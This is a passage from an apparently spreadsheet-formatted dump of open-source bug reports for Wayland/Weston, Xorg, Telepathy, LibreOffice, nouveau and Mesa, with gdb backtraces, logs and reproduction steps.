              ptr = 0x0 fd = 0 u32 = 0 u64 = 0}} {events = 0 data = {ptr = 0x0 fd = 0 u32 = 0 u64 = 0}} {events = 0 data = {ptr = 0x7ffff6e40000 fd = -152829952 u32 = 4142137344 
              u64 = 140737335525376}} {events = 2757813764 data = {ptr = 0x100000032 fd = 50 u32 = 50 u64 = 4294967346}} {events = 0 data = {ptr = 0x0 fd = 0 u32 = 0 u64 = 0}} {events = 0 data = {
              ptr = 0xf6e40ff000000000 fd = 0 u32 = 0 u64 = 17790361951486869504}} {events = 32767 data = {ptr = 0x1 fd = 1 u32 = 1 u64 = 1}} {events = 0 data = {ptr = 0xffffde3000000000 fd = 0 
              u32 = 0 u64 = 18446706896472637440}} {events = 32767 data = {ptr = 0x405c40 fd = 4217920 u32 = 4217920 u64 = 4217920}} {events = 4294959472 data = {ptr = 0xa4614f0500007fff fd = 32767 
              u32 = 32767 u64 = 11844835377854578687}} {events = 50 data = {ptr = 0x61b9c0 fd = 6404544 u32 = 6404544 u64 = 6404544}} {events = 2762938986 data = {ptr = 0x303e0dcc00000032 fd = 50 
              u32 = 50 u64 = 3476231132201091122}} {events = 1314329481 data = {ptr = 0xffffffff fd = -1 u32 = 4294967295 u64 = 4294967295}}}
        source = 0x7b3020
        i = 0
        count = 1
        n = 0
#13 0x00007ffff6e478c4 in wl_display_run (display=0x61b970) at wayland-server.c:1027
No locals.
#14 0x000000000040ec7b in main (argc=1 argv=0x7fffffffe178) at compositor.c:3363
        ret = 0
        display = 0x61b970
        ec = 0x61cba0
        signals = {0x61ba40 0x61ba90 0x61c130 0x61c180}
        loop = 0x61b9c0
        segv_action = {__sigaction_handler = {sa_handler = 0x40e439  sa_sigaction = 0x40e439 } sa_mask = {__val = {0 }} sa_flags = -2147483644 
          sa_restorer = 0x840}
        shell_module = 0x0
        backend_module = 0x1
        xserver_module = 0x7ffff5559e70
        module_init = 0
        backend_init = 0x7ffff534f5dc 
        i = 1
        backend = 0x4145f4 x11-backend.so
        shell = 0x61c410 desktop-shell.so
        module = 0x0
        log = 0x0
        idle_time = 300
        xserver = 0
        socket_name = 0x0
        config_file = 0x61bae0 \340\336{
        shell_config_keys = {{name = 0x41447d type type = CONFIG_KEY_STRING data = 0x7fffffffdf68}}
        cs = {{name = 0x414482 shell keys = 0x7fffffffdf30 num_keys = 1 done = 0}}
        core_options = {{type = WESTON_OPTION_STRING name = 0x414488 backend short_name = 66 data = 0x7fffffffdf70} {type = WESTON_OPTION_STRING name = 0x414490 socket short_name = 83 
            data = 0x7fffffffdf48} {type = WESTON_OPTION_INTEGER name = 0x414497 idle-time short_name = 105 data = 0x7fffffffdf54} {type = WESTON_OPTION_BOOLEAN name = 0x4144a1 xserver 
            short_name = 0 data = 0x7fffffffdf50} {type = WESTON_OPTION_STRING name = 0x4144a9 module short_name = 0 data = 0x7fffffffdf60} {type = WESTON_OPTION_STRING name = 0x4144b0 log 
            short_name = 0 data = 0x7fffffffdf58}}
(gdb) q
wayland master 6e94028c31d06999cb9848b1bd0348ea2f683516
weston  master bf1e8660edc9aee7c270f34ad624f91cd6dcfc1f</t>
  </si>
  <si>
    <t>WAYLAND-49456</t>
  </si>
  <si>
    <t>[bug] XWayland problems</t>
  </si>
  <si>
    <t>XWayland has a few problems:
Typing a url into firefox is not usable - some excessive key repeating some unresponsiveness.  
Resizing an X client window crashes Weston.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-6828</t>
  </si>
  <si>
    <t>@ key does not work Cherry CyMotion Master Linux</t>
  </si>
  <si>
    <t>On the CyMotion Master Linux the @ key is the right window key.
It can be enabled in /etc/X11/xkb/symbols/inet
Find below my changes to inet for the cymotionlinux keys.
...
partial alphanumeric_keys
xkb_symbols cymotionlinux {
    key   {   [   at              ]   }
    key    {   [   XF86MenuKB      ]   }
    key    {   [   XF86Paste       ]   }
    key    {   [   XF86PowerOff    ]   }
    key    {   [   XF86Eject       ]   }
    key    {   [   XF86ScrollUp    ]   }
    key   {   [   Redo            ]   }
    key   {   [   XF86Search      ]   }
    key    {   [   XF86WWW         ]   }
    key    {   [   Undo            ]   }
    key    {   [   XF86ScrollDown  ]   }
    key    {   [   XF86AudioPrev   ]   }
    key    {   [   XF86Launch2     ]   }
    key    {   [   XF86AudioNext   ]   }
    key    {   [   XF86Launch1     ]   }
    key    {   [   XF86AudioMute   ]   }
    key    {   [   XF86Calculator  ]   }
    key    {   [   XF86AudioPlay   ]   }
    key    {   [   XF86AudioStop   ]   }
    key    {   [   XF86Launch3     ]   }
    key    {   [   XF86AudioLowerVolume    ]   }
    key    {   [   XF86AudioRaiseVolume    ]   }
    key    {   [   XF86Cut         ]   }
    key    {   [   XF86Standby     ]   }
    key    {   [   XF86Reload      ]   }
    key    {   [   XF86Forward     ]   }
    key    {   [   XF86Back        ]   }
    key    {   [   XF86Mail        ]   }
    key    {   [   XF86Copy        ]   }
    key   {   [   XF86AudioMedia  ]   }
...</t>
  </si>
  <si>
    <t>stefan.brandner</t>
  </si>
  <si>
    <t>XORG-5054</t>
  </si>
  <si>
    <t>Fail to compile RC2</t>
  </si>
  <si>
    <t>I can not compile RC2.  My system is a heavily patched Slackware.  I have
compiled  the previous releases without problems.  Here is what I get:
In file included from xf86Ur-98.c:12:
/usr/include/linux/joystick.h:131: error: parse error before __s64
/usr/include/linux/joystick.h:135: error: parse error before '}' token
In file included from xf86Ur-98.cxf86Ur-98.c::12:
/usr/include/linux/joystick.h:142:2: #error Unexpected BITS_PER_LONG
make[7]: *** [xf86Ur-98.o] Error 1
gcc 3.4.4 Linux kernel 2.6.13.2
Looks like the typedef for  __s64g is not being found.   Not sure the proper fix
for this one.</t>
  </si>
  <si>
    <t>gem</t>
  </si>
  <si>
    <t>TELEPATHY-71539</t>
  </si>
  <si>
    <t>segfault in tp_debug_sender_add_message_vprintf()</t>
  </si>
  <si>
    <t>That's an issue frequently reported in Ubuntu 13.10 (using 5.14.1)
Stacktrace
#0  0x00007f2b3ca15f90 in _IO_vfprintf_internal (s=s@entry=0x7fff0444f9d0 format= format@entry=0x448aa8 %s: Migrated %s to new location: deleting old copy ap=ap@entry=0x7fff0444fb88) at vfprintf.c:1655
        len = 
        string_malloced = 
        step0_jumps = {0 -11263 -4214 -4124 -4027 -3937 -3826 -3532 -3116 -2815 -2692 -1937 -2239 -2139 -1766 -16687 265 280 47 2130 -15904 -28 883 -5283 -5210 -17380 567 -2039 -2139 -3638}
        space = 0
        is_short = 0
        use_outdigits = 0
        step1_jumps = {0 0 0 0 0 0 0 0 0 -2815 -2692 -1937 -2239 -2139 -1766 -16687 265 280 47 2130 -15904 -28 883 -5283 -5210 -17380 567 -2039 -2139 0}
        group = 0
        prec = -1
        step2_jumps = {0 0 0 0 0 0 0 0 0 0 -2692 -1937 -2239 -2139 -1766 -16687 265 280 47 2130 -15904 -28 883 -5283 -5210 -17380 567 -2039 -2139 0}
        string = 
        left = 0
        is_long_double = 0
        width = 0
        step3a_jumps = {0 0 0 0 0 0 0 0 0 0 -2037 0 0 0 -1766 -16687 265 280 47 0 0 0 0 -5283 0 0 0 0 0 0}
        alt = 0
        showsign = 0
        is_long = 0
        is_char = 0
        pad = 32 ' '
        step3b_jumps = {0  -2239 0 0 -1766 -16687 265 280 47 2130 -15904 -28 883 -5283 -5210 -17380 567 0 0 0}
        step4_jumps = {0  -1766 -16687 265 280 47 2130 -15904 -28 883 -5283 -5210 -17380 567 0 0 0}
        is_negative = 
        number = 
        base = 
        the_arg = {pa_wchar = 0 L'\000' pa_int = 0 pa_long_int = 0 pa_long_long_int = 0 pa_u_int = 0 pa_u_long_int = 0 pa_u_long_long_int = 0 pa_double = 0 pa_long_double = 0 pa_string = 0x0 pa_wstring = 0x0 pa_pointer = 0x0 pa_user = 0x0}
        spec = 115 's'
        _buffer = {__routine = 0x0 __arg = 0x0 __canceltype = 0 __prev = 0x0}
        _avail = 
        thousands_sep = 0x0
        grouping = 0xffffffffffffffff 
        done = 16
        f = 0x448ab6 s to new location: deleting old copy
        lead_str_end = 0x448aa8 %s: Migrated %s to new location: deleting old copy
        end_of_spec = 
        work_buffer = '\000' \246 \265\230&gt;+\177\000\000\000\000\000\000\000\000\000\000\006\000\000\000\000\000\000\000\220\371D\004\377\177\000\000\246\265\230&gt;+\177\000\000\236\203\323\220\000\000\000\000\n\000\000\000\000\000\000\000\260\371D\004\377\177\000\000@\227\330...
        workstart = 0x0
        workend = 0x7fff0444f988 \320\371D\004\377\177
        ap_save = {{gp_offset = 8 fp_offset = 48 overflow_arg_area = 0x7fff0444fc70 reg_save_area = 0x7fff0444fba0}}
        nspecs_done = 1
        save_errno = 11
        readonly_format = 0
        args_malloced = 0x0
        specs = 0x0
        specs_malloced = false
        jump_table = \001\000\000\004\000\016\000\006\000\000\a\002\000\003\t\000\005\b\b\b\b\b\b\b\b\b\000\000\000\000\000\000\000\032\000\031\000\023\023\023\000\035\000\000\f\000\000\000\000\000\000\025\000\000\000\000\022\000\r\000\000\000\000\000\000\032\000\024\017\023\023\023\n\017\034\000\v\030\027\021\026\f\000\025\033\020\000\000\022\000\r
        __PRETTY_FUNCTION__ = _IO_vfprintf_internal
#1  0x00007f2b3cad9e61 in __GI___vasprintf_chk (result_ptr=result_ptr@entry=0x7fff0444fb18 flags=flags@entry=1 format=0x448aa8 %s: Migrated %s to new location: deleting old copy args=0x7fff0444fb88) at vasprintf_chk.c:66
        string = 0x20827b0 _list: Migrated t have group 'Desktop Entry'
        sf = {_sbf = {_f = {_flags = -72515584 _IO_read_ptr = 0x20827b0 _list: Migrated t have group 'Desktop Entry' _IO_read_end = 0x20827b0 _list: Migrated t have group 'Desktop Entry' _IO_read_base = 0x20827b0 _list: Migrated t have group 'Desktop Entry' _IO_write_base = 0x20827b0 _list: Migrated t have group 'Desktop Entry' _IO_write_ptr = 0x20827c0 t have group 'Desktop Entry' _IO_write_end = 0x2082814  _IO_buf_base = 0x20827b0 _list: Migrated t have group 'Desktop Entry' _IO_buf_end = 0x2082814  _IO_save_base = 0x0 _IO_backup_base = 0x0 _IO_save_end = 0x0 _markers = 0x0 _chain = 0x0 _fileno = 1023667551 _flags2 = 4 _old_offset = 34018112 _cur_column = 0 _vtable_offset = 10 '\n' _shortbuf = \002 _lock = 0x0 _offset = 34271376 _codecvt = 0x4489f8 _wide_data = 0x0 _freeres_list = 0x0 _freeres_buf = 0x0 _freeres_size = 139823683620729 _mode = -1 _unused2 = \000\000\000\000\200\360\003=+\177\000\000@\255\n\002\000\000\000} vtable = 0x7f2b3cd88760 } _s = {_allocate_buffer = 0x7f2b3ca4c470  _free_buffer = 0x7f2b3ca4c900 }}
        ret = 
        needed = 
        allocated = 
#2  0x00007f2b3d034cdc in vasprintf (__ap= __fmt= __ptr=0x7fff0444fb18) at /usr/include/x86_64-linux-gnu/bits/stdio2.h:210
No locals.
#3  g_vasprintf (string=string@entry=0x7fff0444fb18 format= args=args@entry=0x7fff0444fb88) at /build/buildd/glib2.0-2.37.6/./glib/gprintf.c:314
        __PRETTY_FUNCTION__ = g_vasprintf
#4  0x00007f2b3d0123b0 in g_strdup_vprintf (format= args=args@entry=0x7fff0444fb88) at /build/buildd/glib2.0-2.37.6/./glib/gstrfuncs.c:517
        string = 0x0
#5  0x00007f2b3e45e89a in tp_debug_sender_add_message_vprintf (self=0x206e330 timestamp=0x0 formatted=0x0 domain=0x43a3ae mcd level=G_LOG_LEVEL_DEBUG format= args=0x7fff0444fb88) at debug-sender.c:452
        message = 0x0
#6  0x000000000040ebc4 in mcd_debug (format=format@entry=0x448aa8 %s: Migrated %s to new location: deleting old copy) at mcd-debug.c:189
        message = 0x0
        formatted = 
        dbg = 0x206e330
        args = {{gp_offset = 24 fp_offset = 48 overflow_arg_area = 0x7fff0444fc70 reg_save_area = 0x7fff0444fba0}}
#7  0x00000000004394e6 in _list (self=0x2087b20 am=0x20af090) at mcd-account-manager-default.c:780
        i = 
        n = 139823710566149
        accounts = 
        rval = 0x0
        amd = 0x2087b20
        __FUNCTION__ = _list
#8  0x0000000000435532 in mcd_storage_load (self=) at mcd-storage.c:371
        account = 
        pname = 
        prio = 
        plugin = 0x2087b20
        stored = 
        ma = 0x20af090
        store = 0x207e160
        __PRETTY_FUNCTION__ = mcd_storage_load
        __FUNCTION__ = mcd_storage_load
#9  0x000000000042858a in _mcd_account_manager_constructed (obj=) at mcd-account-manager.c:1648
        account_manager = 0x2087a60
        priv = 
        i = 0
        sig = {{name = 0x43afe5 created handler = 0x4286b0 } {name = 0x4425dd altered handler = 0x429c20 } {name = 0x4425e5 toggled handler = 0x429af0 } {name = 0x4425ed deleted handler = 0x4285d0 } {name = 0x4425f5 altered-one handler = 0x429a00 } {name = 0x442601 reconnect handler = 0x429940 } {name = 0x0 handler = 0x0}}
        __FUNCTION__ = _mcd_account_manager_constructed
#10 0x00007f2b3d4e84aa in g_object_new_internal (class=class@entry=0x207bf90 params=params@entry=0x7fff0444ff50 n_params=1) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:1785
        nqueue = 0x207a850
        object = 0x2087a60
        __FUNCTION__ = g_object_new_internal
#11 0x00007f2b3d4ea634 in g_object_new_valist (object_type=object_type@entry=34060608 first_property_name=first_property_name@entry=0x43a90d dbus-daemon var_args=var_args@entry=0x7fff044500a8) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:2002
        stack_params = {{pspec = 0x20b1190 value = 0x7fff0444fea0} {pspec = 0x7f2b3c9d9cf0 value = 0x4034b0} {pspec = 0x500000000 value = 0x1000004a2} {pspec = 0x7f2b3d4d5858 value = 0x7fff04450128} {pspec = 0x7fff04450100 value = 0x7f2b3eb7fb30} {pspec = 0x7f2b3eba65c0 value = 0x7f2b3eba6268} {pspec = 0x5 value = 0x7f2b3e98c1a9} {pspec = 0x0 value = 0x7f2b3eb7fb30} {pspec = 0x5 value = 0x0} {pspec = 0x1 value = 0x7f2b3eba6268} {pspec = 0x2077550 value = 0x6598d8 } {pspec = 0x0 value = 0x2073b50} {pspec = 0x0 value = 0x7f2b3eba65c0} {pspec = 0x7fff04450060 value = 0x7fff04450050} {pspec = 0x1081a446 value = 0x102078310} {pspec = 0x2077fc0 value = 0x407989}}
        params = 0x7fff0444ff50
        name = 
        n_params = 1
        class = 
        unref_class = 
        object = 
        __PRETTY_FUNCTION__ = g_object_new_valist
        __FUNCTION__ = g_object_new_valist
#12 0x00007f2b3d4eaa14 in g_object_new (object_type=34060608 first_property_name=first_property_name@entry=0x43a90d dbus-daemon) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:1559
        var_args = {{gp_offset = 32 fp_offset = 48 overflow_arg_area = 0x7fff04450190 reg_save_area = 0x7fff044500c0}}
        __PRETTY_FUNCTION__ = g_object_new
#13 0x000000000042963f in mcd_account_manager_new (dbus_daemon=0x2078250) at mcd-account-manager.c:1666
        obj = 
#14 0x0000000000410ad2 in mcd_master_constructor (type=34056960 n_params=2 params=) at mcd-master.c:383
        object_class = 0x207aed0
        master = 0x2078310
        priv = 
        __PRETTY_FUNCTION__ = mcd_master_constructor
        __FUNCTION__ = mcd_master_constructor
#15 0x00007f2b3d4e8404 in g_object_new_with_custom_constructor (n_params=1 params=0x7fff044503a0 class=0x207bce0) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:1665
        cparams = 0x2078da0
        cvalues = 
        node = 0x0
        i = 
        nqueue = 0x0
        object = 
        n_cparams = 2
        cvals_used = 1
#16 g_object_new_internal (class=class@entry=0x207bce0 params=params@entry=0x7fff044503a0 n_params=1) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:1744
        nqueue = 0x0
        object = 
        __FUNCTION__ = g_object_new_internal
#17 0x00007f2b3d4ea634 in g_object_new_valist (object_type=object_type@entry=34056960 first_property_name=first_property_name@entry=0x43a90d dbus-daemon var_args=var_args@entry=0x7fff044504f8) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:2002
        stack_params = {{pspec = 0x2073b50 value = 0x7fff044502f0} {pspec = 0x100000000 value = 0x10000025d} {pspec = 0x80 value = 0x7fff04450568} {pspec = 0x7fff04450540 value = 0x0} {pspec = 0x7f2b3eba65c0 value = 0x7f2b3eba6268} {pspec = 0x1 value = 0x7f2b3e98c1a9} {pspec = 0x0 value = 0x0} {pspec = 0x1 value = 0x0} {pspec = 0x1 value = 0x7f2b3eba6268} {pspec = 0x3100000006 value = 0x6e0000005b} {pspec = 0x7c00000077 value = 0x7fff04450460} {pspec = 0x0 value = 0x7f2b3eba65c0} {pspec = 0x7fff044504a0 value = 0x7fff04450490} {pspec = 0x180b0cb value = 0x13cd89740} {pspec = 0x2066510 value = 0x404a8d} {pspec = 0xffffffff value = 0x207abd0}}
        params = 0x7fff044503a0
        name = 
        n_params = 1
        class = 
        unref_class = 
        object = 
        __PRETTY_FUNCTION__ = g_object_new_valist
        __FUNCTION__ = g_object_new_valist
#18 0x00007f2b3d4eaa14 in g_object_new (object_type=34056960 first_property_name=first_property_name@entry=0x43a90d dbus-daemon) at /build/buildd/glib2.0-2.37.6/./gobject/gobject.c:1559
        var_args = {{gp_offset = 32 fp_offset = 48 overflow_arg_area = 0x7fff044505e0 reg_save_area = 0x7fff04450510}}
        __PRETTY_FUNCTION__ = g_object_new
#19 0x000000000041026c in mcd_service_new () at mcd-service.c:180
        obj = 
        dbus_daemon = 0x2078250
        error = 0x0
#20 0x000000000040e340 in main (argc= argv=) at mc-server.c:174
        act = {__sigaction_handler = {sa_handler = 0xf63d4e2e sa_sigaction = 0xf63d4e2e} sa_mask = {__val = {5318445309 33964032 4225460 4294967295 166027348 139823677280544 139823712591872 33964416 0 33983104 1 1 4432397 0 0 4432304}} sa_flags = 4253175 sa_restorer = 0x7fff04450810}
        empty_mask = {__val = {1 139823710519721 0 139823712566064 1 0 1 139823712723560 80 33973520 0 140733265020672 0 139823712724416 140733265020608 140733265020592}}</t>
  </si>
  <si>
    <t>LIBREOFFICE-42325</t>
  </si>
  <si>
    <t>Can not alter the To: address on an envelope after it is inserted</t>
  </si>
  <si>
    <t>I can not alter the To: address on an envelope after it is inserted.  Would you please fix this for me?  Many thanks
-T</t>
  </si>
  <si>
    <t>XORG-24957</t>
  </si>
  <si>
    <t>[945GM] segfaults after using xrandr</t>
  </si>
  <si>
    <t>Created attachment 31012
xorg log
Chipset: 945GM
System: Linux distorted 2.6.31-ARCH #1 SMP PREEMPT Fri Oct 23 11:12:58 CEST 2009 i686 Genuine Intel(R) CPU L2400 @ 1.66GHz GenuineIntel GNU/Linux
Versions:
  X = 1.7.1-1
  intel = 2.9.1
  drm = 2.4.5
Distribution: Arch Linux i686
System: Lenovo Thinkpad X60s
Display: LVDS and VGA
Reproduce steps:
- Start X with XFCE with compositing turned off (regular 2D) in a single-monitor mode no X config
- Use xrandr to enable VGA output to 1280x1024@75 screen
- Open Yakuake or GNOME Do
- X segfaults
Xorg log attached with stack trace.  If there's anything I can do to help hunt this down please let me know.  I have searched and googled and didn't see anything that seemed relevant to this bug report.</t>
  </si>
  <si>
    <t>rmcauley</t>
  </si>
  <si>
    <t>TELEPATHY-18713</t>
  </si>
  <si>
    <t>Gabble asserts with vcard/test-avatar-tokens.py</t>
  </si>
  <si>
    <t>The unit test vcard/test-avatar-tokens.py makes Gabble crash.
Tested with Gabble master (99d02aca906087861dfab9dd4dde252957d53386).
100% reproductible.
  File ./vcard/test-avatar-tokens.py line 55 in test
    conn.Disconnect()
(telepathy-gabble:31119): GLib-GObject-WARNING **: instance with invalid (NULL) class pointer
GLib-GObject-CRITICAL **: g_signal_handlers_destroy: assertion `G_TYPE_CHECK_INSTANCE (instance)' failed
aborting...
#0  IA__g_logv (log_domain=0x2b2a776a92fc GLib-GObject 
    log_level=G_LOG_LEVEL_CRITICAL 
    format=0x2b2a77d9c567 %s: assertion `%s' failed args1=0x7fff33d0b160)
    at gmessages.c:503
#1  0x00002b2a77d49d83 in IA__g_log (log_domain=0x2b2a785f89e0  
    log_level=2017228536 format=0x2677bf0 ) at gmessages.c:517
#2  0x00002b2a77682ffd in g_object_real_dispose (object=0x2b2a785f89e0)
    at gobject.c:739
#3  0x00002b2a77683292 in IA__g_object_unref (_object=)
    at gobject.c:2393
#4  0x00002b2a77d323e2 in g_hash_table_remove_all_nodes (hash_table=0x26744f0 
    notify=1) at ghash.c:374
#5  0x00002b2a77d32c48 in IA__g_hash_table_remove_all (hash_table=0x26744f0)
    at ghash.c:1051
#6  0x00002b2a77d32df5 in IA__g_hash_table_destroy (hash_table=0x2b2a785f89e0)
    at ghash.c:758
#7  0x000000000042d215 in gabble_roster_close_all (self=0x2670c20)
    at roster.c:1705
#8  0x00002b2a776811dd in IA__g_closure_invoke (closure=0x2676150 
    return_value=0x0 n_param_values=3 param_values=0x2684280 
    invocation_hint=0x7fff33d0b440) at gclosure.c:767
#9  0x00002b2a77698240 in signal_emit_unlocked_R (node=0x266bf90 detail=0 
    instance=0x2672120 emission_return=0x0 instance_and_params=0x2684280)
    at gsignal.c:3244
#10 0x00002b2a77699929 in IA__g_signal_emit_valist (instance=0x2672120 
    signal_id= detail=0 var_args=0x7fff33d0b620)
    at gsignal.c:2977
#11 0x00002b2a77699e53 in IA__g_signal_emit (instance=0x2b2a785f89e0 
    signal_id=2017228536 detail=40336368) at gsignal.c:3034
#12 0x00002b2a7800af83 in tp_base_connection_change_status (self=0x2672120 
    status= reason=TP_CONNECTION_STATUS_REASON_REQUESTED)
    at base-connection.c:2656
#13 0x00002b2a771e0847 in gobject_message_function (connection=0x2664c60 
    message=0x26667d0 user_data=) at dbus-gobject.c:1284
#14 0x00002b2a77425ad9 in _dbus_object_tree_dispatch_and_unlock (
    tree=0x2664910 message=0x26667d0) at dbus-object-tree.c:856
#15 0x00002b2a77410b9f in dbus_connection_dispatch (connection=0x2664c60)
    at dbus-connection.c:4447
#16 0x00002b2a771dd3a5 in message_queue_dispatch (
    source= callback= 
    user_data=) at dbus-gmain.c:101
#17 0x00002b2a77d3fc9b in IA__g_main_context_dispatch (context=0x26606d0)
    at gmain.c:1814
#18 0x00002b2a77d4344d in g_main_context_iterate (context=0x26606d0 block=1 
    dispatch=1 self=) at gmain.c:2448
#19 0x00002b2a77d4397d in IA__g_main_loop_run (loop=0x265afc0) at gmain.c:2656
#20 0x00002b2a7806e5c6 in tp_run_connection_manager (
    prog_name=0x465748 telepathy-gabble version=0x462bda 0.7.15.1 
    construct_cm=0x416da0  argc= 
    argv=) at run.c:261
#21 0x00002b2a782c81a6 in __libc_start_main () from /lib/libc.so.6
#22 0x000000000040fcb9 in _start ()</t>
  </si>
  <si>
    <t>LIBREOFFICE-85240</t>
  </si>
  <si>
    <t>Translation of file type text ... in Save As Dialog is wrong in German</t>
  </si>
  <si>
    <t>Problem description: 
When I want to select the file type with save as one file type in the list ist translated to Text - VerschlÃ¼sselung wÃ¤hlen where VerschlÃ¼sselung means Encryption which is wrong. I guess in English you will find text - choose (en)coding. So the translation is completely misleading.
Prior versions had a much better translation.
To the german translator: Der Text wird hier nicht verschlÃ¼sselt sondern man wÃ¤hlt die Textkodierung aus d.h. wie der Text gespeichert wird.
Steps to reproduce:
1. Save As
2. See file type list
Current behavior:
Text - VerschlÃ¼sselung wÃ¤hlen
Expected behavior:
Text - Kodierung wÃ¤hlen
(The bug submission assistant sucks)</t>
  </si>
  <si>
    <t>tvw</t>
  </si>
  <si>
    <t>XORG-29171</t>
  </si>
  <si>
    <t>Garbled console on Macbook 13 (61 9400M]) when using EFI</t>
  </si>
  <si>
    <t>Created attachment 37238
Kernel config for EFI boot
On my macbook 13 (late 2009 61) with a GeForce 9400M (0x0ac180b1) when booting nouveaufb kicks in and displays a garbled screen. Mostly black some greenish lines some very unreadable text.
Interestingly that only happens when I use the Macbook's native EFI mode (i.e. *without* BIOS emulation).
If I use the BIOS emulation then nouveau works.
Typing blindly I extracted the dmesg output from an EFI boot:
#grep -i -e drm -e nouv -e fb efi-dmesg
Kernel command line: BOOT_IMAGE=/boot/experimental root=/dev/sda5 video=efifb reboot=pci
efifb: probing for efifb
efifb: framebuffer at 0xc0010000 mapped to 0xffffc90004580000 using 6400k total 6400k
efifb: mode is 1280x800x32 linelength=8192 pages=1
efifb: scrolling: redraw
efifb: Truecolor: size=8:8:8:8 shift=24:16:8:0
fb0: EFI VGA frame buffer device
[drm] Initialized drm 1.1.0 20060810
nouveau 0000:02:00.0: enabling device (0002 -&gt; 0003)
nouveau 0000:02:00.0: PCI INT A -&gt; Link[LGPU] -&gt; GSI 16 (level low) -&gt; IRQ 16
nouveau 0000:02:00.0: setting latency timer to 64
[drm] nouveau 0000:02:00.0: Detected an NV50 generation card (0x0ac180b1)
fb: conflicting fb hw usage nouveaufb vs EFI VGA - removing generic driver
[drm] nouveau 0000:02:00.0: Attempting to load BIOS image from ACPI
[drm] nouveau 0000:02:00.0: ... BIOS signature not found
[drm] nouveau 0000:02:00.0: Attempting to load BIOS image from PRAMIN
[drm] nouveau 0000:02:00.0: ... appears to be valid
[drm] nouveau 0000:02:00.0: BIT BIOS found
[drm] nouveau 0000:02:00.0: Bios version 62.79.77.00
[drm] nouveau 0000:02:00.0: TMDS table revision 2.0 not currently supported
[drm] nouveau 0000:02:00.0: Found Display Configuration Block version 4.0
[drm] nouveau 0000:02:00.0: Raw DCB entry 0: 01000123 00010014
[drm] nouveau 0000:02:00.0: Raw DCB entry 1: 02021232 00000010
[drm] nouveau 0000:02:00.0: Raw DCB entry 2: 02021286 0f220010
[drm] nouveau 0000:02:00.0: Raw DCB entry 3: 0000000e 00000000
[drm] nouveau 0000:02:00.0: DCB connector table: VHER 0x40 5 16 4
[drm] nouveau 0000:02:00.0:   0: 0x00000040: type 0x40 idx 0 tag 0xff
[drm] nouveau 0000:02:00.0:   1: 0x0000a146: type 0x46 idx 1 tag 0x08
[drm] nouveau 0000:02:00.0: Parsing VBIOS init table 0 at offset 0xDC70
[drm] nouveau 0000:02:00.0: Parsing VBIOS init table 1 at offset 0xDF48
[drm] nouveau 0000:02:00.0: Parsing VBIOS init table 2 at offset 0xDF4A
[drm] nouveau 0000:02:00.0: Parsing VBIOS init table 3 at offset 0xE00B
[drm] nouveau 0000:02:00.0: Parsing VBIOS init table 4 at offset 0xE0D0
[drm] nouveau 0000:02:00.0: Parsing VBIOS init table at offset 0xE135
[drm] nouveau 0000:02:00.0: 0xE135: Condition still not met after 20ms skipping following opcodes
[drm] nouveau 0000:02:00.0: Couldn't find matching output script table
[drm] nouveau 0000:02:00.0: 0xC88E: parsing output script 0
[drm] nouveau 0000:02:00.0: 0xCB5A: parsing output script 0
[drm] nouveau 0000:02:00.0: Detected 256MiB VRAM
[drm] nouveau 0000:02:00.0: Stolen system memory at: 0x0070000000
[drm] nouveau 0000:02:00.0: 512 MiB GART (aperture)
[drm] nouveau 0000:02:00.0: Allocating FIFO number 1
[drm] nouveau 0000:02:00.0: nouveau_channel_alloc: initialised FIFO 1
[drm] nouveau 0000:02:00.0: Detected a LVDS output
[drm] nouveau 0000:02:00.0: Detected a TMDS output
[drm] nouveau 0000:02:00.0: Detected a DP output
[drm] nouveau 0000:02:00.0: Detected a LVDS connector
[drm] nouveau 0000:02:00.0: Detected a DisplayPort connector
[drm] nouveau 0000:02:00.0: timeout: (0x610200 &amp; 0x1e0000) != 0
[drm] nouveau 0000:02:00.0: 0x610200 = 0x0c052b08
[drm] nouveau 0000:02:00.0: timeout: (0x610200 &amp; 0x1e0000) == 0
[drm] nouveau 0000:02:00.0: 0x610200 = 0x0c050008
[drm] nouveau 0000:02:00.0: nouveau_channel_free: freeing fifo 1
nouveau 0000:02:00.0: PCI INT A disabled
nouveau: probe of 0000:02:00.0 failed with error -16
Kernel version: 2.6.35-rc3 (config attached)
Distribution: Gentoo
What's wrong? Let me know if you need anything can even provide shell access if need be.</t>
  </si>
  <si>
    <t>felix.leimbach</t>
  </si>
  <si>
    <t>LIBREOFFICE-67546</t>
  </si>
  <si>
    <t>EDITING: related fields not shown if key is set as bigint unsigned on mysql</t>
  </si>
  <si>
    <t>With the 4.1 version base no longer shows related fields of 1:n relationships in subforms of a mysql (native) db. A little experimenting showed that this happens only when the primary key is set to bigint unsigned. bigint alone works as do int unsigned.
Steps to reproduce:
1. create a simple mysql database
  CREATE TABLE `series` (
    `id` bigint unsigned NOT NULL AUTO_INCREMENT
    `title` varchar(255) NOT NULL
    PRIMARY KEY (`id`)
  )
  CREATE TABLE `episode` (
    `id` bigint unsigned NOT NULL AUTO_INCREMENT
    `series_id` bigint unsigned DEFAULT NULL
    `title` varchar(255) NOT NULL
    PRIMARY KEY (`id`)
  )
2. link this db to LibreOffice base and create a simple form with the wizard
  Table series add subform Table episode join series_id and id
3. you can enter data in both tables but stored data in the episode table is not shown once you change the active record in the series table.</t>
  </si>
  <si>
    <t>MESA-79470</t>
  </si>
  <si>
    <t>[llvmpipe] src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2343:emit_fetch_texels: Assertion `0' failed.</t>
  </si>
  <si>
    <t>mesa: 83bba8f14603022c6c80bef95020e079d7cb73c0 (master 10.3.0-devel)
Run piglit glsl-resource-not-bound 2DMS on llvmpipe.
$ ./bin/glsl-resource-not-bound 2DMS -auto
Mesa warning: Unexpected target 0x9100 in store_texsubimage()
src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c:2343:emit_fetch_texels: Assertion `0' failed.
Trace/breakpoint trap (core dumped)
(gdb) bt
#0  0x00007ff68349c3ad in _debug_assert_fail (expr=0x7ff683e5dda3 0 file=0x7ff683e5db38 src/gallium/auxiliary/gallivm/lp_bld_tgsi_soa.c 
    line=2343 function=0x7ff683e5e6f0  emit_fetch_texels) at src/gallium/auxiliary/util/u_debug.c:277
